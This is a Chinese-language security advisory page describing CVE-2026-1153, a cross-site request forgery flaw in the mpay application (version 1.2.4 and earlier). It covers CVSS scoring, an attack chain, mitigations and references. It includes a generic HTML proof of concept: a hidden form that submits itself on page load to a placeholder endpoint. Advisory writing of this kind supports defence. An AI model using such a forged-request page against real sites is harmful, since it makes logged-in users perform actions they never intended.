CVE-2026-1153 CVSS 4.3 中危

CVE-2026-1153 technical-laohu mpay 跨站请求伪造漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1153

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

technical-laohu mpay

漏洞概述

CVE-2026-1153是存在于technical-laohu mpay应用程序中的一个跨站请求伪造（CSRF）漏洞。该漏洞影响mpay版本1.2.4及以下版本，攻击者可以通过构造恶意链接或网页，诱使已登录用户在不知情的情况下执行非预期的操作。由于该漏洞无需认证即可发起攻击（PR:N），且可以通过网络远程利用（AV:N），因此存在一定的安全风险。攻击成功需要用户交互（UI:R），攻击者可利用此漏洞对应用程序的功能进行未授权操作，可能导致数据篡改或业务逻辑被滥用。该漏洞已被公开披露，相关信息可在多个安全数据库中查询到。

技术细节

跨站请求伪造漏洞允许攻击者诱导已认证用户在mpay应用程序上执行未经授权的操作。漏洞存在于mpay的某个未知函数中，缺少有效的CSRF令牌验证机制。攻击者可以创建一个恶意网页或链接，其中包含针对mpay应用程序的自动提交表单。当已登录用户访问该恶意页面时，浏览器会自动发送携带用户会话Cookie的请求到目标应用程序。由于应用程序无法区分合法请求和伪造请求，攻击者的恶意操作将被执行。CVSS向量显示机密性影响为低（C:L），完整性影响为低（I:L），可用性无影响（A:N），表明该漏洞主要影响数据的完整性和部分机密性。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含自动提交的表单，指向mpay应用程序的漏洞端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导已登录用户访问恶意页面

STEP 3

步骤3

用户浏览器自动发送携带有效会话Cookie的POST请求到mpay服务器

STEP 4

步骤4

mpay应用程序接收到请求，由于缺少CSRF令牌验证，视为合法请求执行

STEP 5

步骤5

攻击者的恶意操作在用户上下文中成功执行，导致数据篡改或未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2026-1153 -->
<!-- Target: technical-laohu mpay -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Test - CVE-2026-1153</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2026-1153</h1>
    <p>If you see this page, CSRF attack has been triggered.</p>
    
    <!-- Auto-submit form targeting vulnerable endpoint -->
    <form id="csrfForm" action="http://target-site.com/mpay/vulnerable-endpoint" method="POST" style="display:none;">
        <!-- Replace with actual vulnerable parameters -->
        <input type="hidden" name="action" value="malicious_action">
        <input type="hidden" name="param1" value="value1">
        <input type="hidden" name="param2" value="value2">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrfForm').submit();
        
        // Log submission attempt
        console.log('CSRF PoC executed for CVE-2026-1153');
    </script>
</body>
</html>

影响范围

technical-laohu mpay <= 1.2.4

防御指南

临时缓解措施

在等待官方修复期间，可通过以下措施临时缓解：1）限制用户对敏感操作的访问权限；2）增加操作确认机制，要求用户二次验证重要操作；3）监控异常请求模式；4）使用WAF规则过滤可疑请求；5）加强用户安全意识培训，避免点击未知链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1153
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1153
3 Details https://www.cvedetails.com/cve/CVE-2026-1153/
4 VulDB https://vuldb.com/cve/CVE-2026-1153
5 Link https://github.com/bdkuzma/vuln/issues/18
6 Link https://vuldb.com/?ctiid.341746
7 Link https://vuldb.com/?id.341746
8 Link https://vuldb.com/?submit.735789

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表